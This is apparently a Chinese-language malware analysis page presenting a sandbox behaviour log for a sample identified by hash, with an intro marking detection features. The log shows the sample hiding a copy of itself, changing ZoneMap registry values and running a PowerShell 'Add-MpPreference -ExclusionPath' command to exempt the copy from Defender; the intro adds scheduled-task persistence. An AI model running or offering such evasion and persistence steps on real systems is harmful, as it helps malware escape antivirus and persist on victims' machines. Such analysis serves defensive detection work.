木马分析 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292

 

 

看下行为（下面是行为监控日志，重点关注几处：样本把自身副本释放到 `C:\Users\bonelee\AppData\Roaming\bWyPLjwQzmw.exe` 并改写其文件属性（attrib:0x00002087，伴随 BA_extract_hidden 事件）；修改 `Internet Settings\ZoneMap` 下的 ProxyBypass/IntranetName/UNCAsIntranet/AutoDetect 注册表值；通过 powershell.exe 执行 `Add-MpPreference -ExclusionPath` 把释放的文件加入 Defender 排除项；再调用 schtasks.exe `/Create /TN "Updates\bWyPLjwQzmw" /XML` 用临时文件 tmp92BB.tmp 创建计划任务做持久化，随后删除该临时文件。这些进程链和文件/注册表改动都是可用于检测的特征）:

09:32:34:044,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:0,	2928,	EXEC_create,	C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	parent_pid:5192 cmdline:'C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe' image_base:0x0000000000FD0000 image_size:0x0008A000 ,	0x00000000 [操作成功完成。  ],	
09:32:34:093,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:3012,	2928,	FILE_readdir,	C:\Windows\Microsoft.NET\Framework,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:32:34:107,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:3012,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:32:34:107,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:0,	2928,	EXEC_module_load,	C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\f2d02f64584169cfed0597e2d00f0a67\mscorlib.ni.dll,	base:0x000000006A3B0000 size:0x0140E000 ,	0x00000000 [操作成功完成。  ],	
09:32:34:138,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:3012,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:32:34:138,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:3012,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:32:34:201,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:3012,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:32:34:216,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:0,	2928,	EXEC_module_load,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System\d06666c43ff6c690db91fd4cde7ddf1c\System.ni.dll,	base:0x0000000069950000 size:0x00A55000 ,	0x00000000 [操作成功完成。  ],	
09:32:34:248,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:3012,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:32:34:248,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:3012,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:32:34:373,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:3012,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:32:34:373,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:3012,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:32:34:404,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:0,	2928,	EXEC_module_load,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\55a85a201d7cfebdc16d4357e3c4efb2\System.Core.ni.dll,	base:0x0000000069130000 size:0x00818000 ,	0x00000000 [操作成功完成。  ],	
09:32:34:420,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:0,	2928,	EXEC_module_load,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\6b3b4bf6dbe30207f4ef50f235d9a8ab\System.Configuration.ni.dll,	base:0x0000000073EC0000 size:0x00106000 ,	0x00000000 [操作成功完成。  ],	
09:32:34:451,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:3012,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:32:34:466,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:0,	2928,	EXEC_module_load,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\7f615844ab7c9db651cca958c10624f5\System.Xml.ni.dll,	base:0x00000000689B0000 size:0x00774000 ,	0x00000000 [操作成功完成。  ],	
09:32:34:576,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:0,	2928,	EXEC_module_load,	C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.17763.737_none_588eeadb78ace734\comctl32.dll,	base:0x0000000073D50000 size:0x0008E000 ,	0x00000000 [操作成功完成。  ],	
09:32:34:669,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:3012,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\Accessibility,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:32:34:669,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:3012,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\Accessibility,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:32:34:716,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:0,	2928,	EXEC_module_load,	C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.17763.737_none_7e4e6d38762cf81f\GdiPlus.dll,	base:0x000000006C7D0000 size:0x0016F000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:413,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:3012,	2928,	FILE_readdir,	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\mscorlib.resources,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:16:413,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:3012,	2928,	FILE_readdir,	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\mscorlib.resources,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:16:413,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:3012,	2928,	FILE_readdir,	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\mscorlib.resources,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:16:452,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:3012,	2928,	FILE_touch,	C:\Users\bonelee\AppData\Roaming\bWyPLjwQzmw.exe,	access:0x0017019F alloc_size:537088 attrib:0x00000020 share_access:0x00000000 disposition:0x00000002 options:0x00000044 ,	0x00000000 [操作成功完成。  ],	
09:33:16:466,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:3012,	2928,	FILE_truncate,	C:\Users\bonelee\AppData\Roaming\bWyPLjwQzmw.exe,	eof:0x00083200 ,	0x00000000 [操作成功完成。  ],	
09:33:16:466,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:3012,	2928,	FILE_write,	C:\Users\bonelee\AppData\Roaming\bWyPLjwQzmw.exe,	offset:0x00000000 datalen:0x00040000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:466,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:3012,	2928,	FILE_chmod,	C:\Users\bonelee\AppData\Roaming\bWyPLjwQzmw.exe,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:466,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:0,	2928,	FILE_modified,	C:\Users\bonelee\AppData\Roaming\bWyPLjwQzmw.exe,	,	0x00000000 [操作成功完成。  ],	
09:33:16:466,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:3012,	2928,	FILE_chmod,	C:\Users\bonelee\AppData\Roaming\bWyPLjwQzmw.exe,	attrib:0x00002087 ,	0x00000000 [操作成功完成。  ],	
09:33:16:466,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:3012,	2928,	BA_extract_hidden,	C:\Users\bonelee\AppData\Roaming\bWyPLjwQzmw.exe,	,	0x00000000 [操作成功完成。  ],	
09:33:16:482,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:3012,	2928,	FILE_setsec,	C:\Users\bonelee\AppData\Roaming\bWyPLjwQzmw.exe,	,	0x00000000 [操作成功完成。  ],	
09:33:16:482,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:3012,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:16:498,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:3012,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:16:513,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:0,	2928,	EXEC_module_load,	C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll,	base:0x0000000068650000 size:0x00357000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:572,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:5172,	2928,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass,	type:0x00000004 datalen:4 data:'01 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:33:16:572,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:5172,	2928,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName,	type:0x00000004 datalen:4 data:'01 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:33:16:572,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:5172,	2928,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet,	type:0x00000004 datalen:4 data:'01 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:33:16:572,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:5172,	2928,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect,	type:0x00000004 datalen:4 data:'00 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:33:16:572,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:5172,	2928,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass,	type:0x00000004 datalen:4 data:'01 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:33:16:572,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:5172,	2928,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName,	type:0x00000004 datalen:4 data:'01 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:33:16:572,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:5172,	2928,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet,	type:0x00000004 datalen:4 data:'01 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:33:16:572,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:5172,	2928,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect,	type:0x00000004 datalen:4 data:'00 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:33:16:603,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:0,	2928,	PROC_exec,	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe,	target_pid:5080 cmdline:'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\bonelee\AppData\Roaming\bWyPLjwQzmw.exe"' ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:0,	2928,	EXEC_create,	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe,	parent_pid:2928 cmdline:'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\bonelee\AppData\Roaming\bWyPLjwQzmw.exe"' image_base:0x0000000001150000 image_size:0x0006C000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:3012,	2928,	FILE_touch,	C:\Users\bonelee\AppData\Local\Temp\tmp92BB.tmp,	access:0x00120089 alloc_size:0 attrib:0x00000080 share_access:0x00000000 disposition:0x00000002 options:0x00000060 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:536,	2928,	FILE_chmod,	C:\Windows\System32\ntdll.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5736,	2928,	FILE_chmod,	C:\Windows\System32\wow64win.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:536,	2928,	FILE_chmod,	C:\Windows\System32\kernel32.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:536,	2928,	FILE_chmod,	C:\Windows\System32\user32.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5768,	2928,	FILE_chmod,	C:\Windows\System32\wow64.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:536,	2928,	FILE_chmod,	C:\Windows\System32\wow64cpu.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5768,	2928,	FILE_chmod,	C:\Windows\SysWOW64\ntdll.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:536,	2928,	FILE_chmod,	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5768,	2928,	FILE_chmod,	C:\Windows\SysWOW64\KernelBase.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:536,	2928,	FILE_chmod,	C:\Windows\System32\locale.nls,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5768,	2928,	FILE_chmod,	C:\Windows\System32\conhost.exe,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:536,	2928,	FILE_chmod,	C:\Windows\SysWOW64\msvcrt.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5768,	2928,	FILE_chmod,	C:\Windows\SysWOW64\oleaut32.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:536,	2928,	FILE_chmod,	C:\Windows\SysWOW64\msvcp_win.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:536,	2928,	FILE_chmod,	C:\Windows\SysWOW64\combase.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:536,	2928,	FILE_chmod,	C:\Windows\SysWOW64\rpcrt4.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:536,	2928,	FILE_chmod,	C:\Windows\SysWOW64\sspicli.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:536,	2928,	FILE_chmod,	C:\Windows\SysWOW64\cryptbase.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:536,	2928,	FILE_chmod,	C:\Windows\SysWOW64\bcryptprimitives.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:536,	2928,	FILE_chmod,	C:\Windows\SysWOW64\sechost.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:536,	2928,	FILE_chmod,	C:\Windows\SysWOW64\advapi32.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:3012,	2928,	FILE_truncate,	C:\Users\bonelee\AppData\Local\Temp\tmp92BB.tmp,	eof:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5736,	2928,	FILE_chmod,	C:\Windows\SysWOW64\kernel32.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5736,	2928,	FILE_chmod,	C:\Windows\SysWOW64\gdi32.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5736,	2928,	FILE_chmod,	C:\Windows\SysWOW64\gdi32full.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5736,	2928,	FILE_chmod,	C:\Windows\SysWOW64\user32.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5736,	2928,	FILE_chmod,	C:\Windows\SysWOW64\win32u.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5768,	2928,	FILE_chmod,	C:\Windows\SysWOW64\ucrtbase.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5736,	2928,	FILE_chmod,	C:\Windows\SysWOW64\atl.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5768,	2928,	FILE_chmod,	C:\Windows\SysWOW64\mscoree.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5736,	2928,	FILE_chmod,	C:\Windows\SysWOW64\imm32.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5768,	2928,	FILE_chmod,	C:\Program Files\WindowsApps\Microsoft.LanguageExperiencePackzh-CN_17763.31.114.0_neutral__8wekyb3d8bbwe\Windows\System32\WindowsPowerShell\v1.0\zh-CN\powershell.exe.mui,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:3012,	2928,	FILE_write,	C:\Users\bonelee\AppData\Local\Temp\tmp92BB.tmp,	offset:0x00000000 datalen:0x00000646 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5820,	2928,	FILE_chmod,	C:\Windows\SysWOW64\shlwapi.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	2928:0,	2928,	FILE_modified,	C:\Users\bonelee\AppData\Local\Temp\tmp92BB.tmp,	,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5820,	2928,	FILE_chmod,	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe.config,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5820,	2928,	FILE_chmod,	C:\Windows\SysWOW64\kernel.appcore.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5820,	2928,	FILE_chmod,	C:\Windows\SysWOW64\version.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5820,	2928,	FILE_chmod,	C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5736,	2928,	FILE_chmod,	C:\Windows\Globalization\Sorting\SortDefault.nls,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:536,	2928,	FILE_chmod,	C:\Windows\SysWOW64\ole32.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:536,	2928,	FILE_chmod,	C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:536,	2928,	FILE_chmod,	C:\Windows\SysWOW64\psapi.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5768,	2928,	FILE_chmod,	C:\Windows\WinSxS\x86_netfx4-mscoreei_dll_b03f5f7f11d50a3a_4.0.15744.551_none_73fe24de2a51a8fe\mscoreei.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5768,	2928,	FILE_chmod,	C:\Windows\SysWOW64\bcrypt.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5744,	2928,	FILE_chmod,	C:\Windows\Microsoft.NET\Framework\v4.0.30319\clrjit.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5820,	2928,	FILE_chmod,	C:\Windows\WinSxS\x86_netfx4-vcruntime140_clr_dll_31bf3856ad364e35_4.0.15744.161_none_dfd2b7ab83adb539\vcruntime140_clr0400.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:536,	2928,	FILE_chmod,	C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5820,	2928,	FILE_chmod,	C:\Windows\System32\C_1252.NLS,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5772,	2928,	FILE_chmod,	C:\Windows\SysWOW64\rsaenh.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:252,	2928,	FILE_chmod,	C:\Windows\SysWOW64\clbcatq.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5736,	2928,	FILE_chmod,	C:\Windows\WinSxS\x86_netfx4-ucrtbase_clr_dll_b03f5f7f11d50a3a_4.0.15744.161_none_2a27da64743bf3cb\ucrtbase_clr0400.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5772,	2928,	FILE_chmod,	C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5736,	2928,	FILE_chmod,	C:\Windows\SysWOW64\winnlsres.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5772,	2928,	FILE_chmod,	C:\Program Files\WindowsApps\Microsoft.LanguageExperiencePackzh-CN_17763.31.114.0_neutral__8wekyb3d8bbwe\Windows\System32\zh-CN\winnlsres.dll.mui,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5772,	2928,	FILE_chmod,	C:\Windows\SysWOW64\shell32.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5772,	2928,	FILE_chmod,	C:\Windows\SysWOW64\cfgmgr32.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5736,	2928,	FILE_chmod,	C:\Windows\Microsoft.NET\Framework\v4.0.30319\zh-Hans\mscorrc.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5772,	2928,	FILE_chmod,	C:\Windows\SysWOW64\SHCore.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5736,	2928,	FILE_chmod,	C:\Windows\SysWOW64\windows.storage.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5772,	2928,	FILE_chmod,	C:\Windows\SysWOW64\profapi.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5772,	2928,	FILE_chmod,	C:\Windows\SysWOW64\powrprof.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5772,	2928,	FILE_chmod,	C:\Windows\SysWOW64\wintrust.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5772,	2928,	FILE_chmod,	C:\Windows\SysWOW64\msasn1.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:252,	2928,	FILE_chmod,	C:\Windows\SysWOW64\crypt32.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5744,	2928,	FILE_chmod,	C:\Windows\SysWOW64\cryptsp.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5820,	2928,	FILE_chmod,	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:536,	2928,	FILE_chmod,	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:5820,	2928,	FILE_chmod,	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.XML.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:16:621,	powershell.exe,	5080:536,	2928,	FILE_chmod,	C:\Windows\SysWOW64\amsi.dll,	attrib:0x00000000 ,	0x00000000 [操作成功完成。  ],	
